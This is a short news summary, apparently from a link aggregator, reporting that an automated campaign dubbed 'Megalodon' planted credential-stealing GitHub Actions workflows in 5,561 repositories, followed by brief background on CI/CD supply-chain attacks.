A large-scale automated attack dubbed 'Megalodon' compromised 5,561 GitHub repositories by injecting malicious CI workflows that steal sensitive credentials and secrets. The attack used two variants: one that triggers on every push/pull request, and another that creates dormant backdoors activated via GitHub API. The campaign successfully exfiltrated various credentials including cloud access keys, SSH keys, and source code secrets.
Background
Software supply chain attacks targeting open source repositories have become increasingly common, with attackers exploiting CI/CD pipelines to distribute malware and steal credentials. GitHub Actions workflows are particularly vulnerable as they often contain sensitive credentials and have broad access to repository contents.
- Source
- Lobsters
- Published
- May 22, 2026 at 05:05 PM
- Score
- 9.0 / 10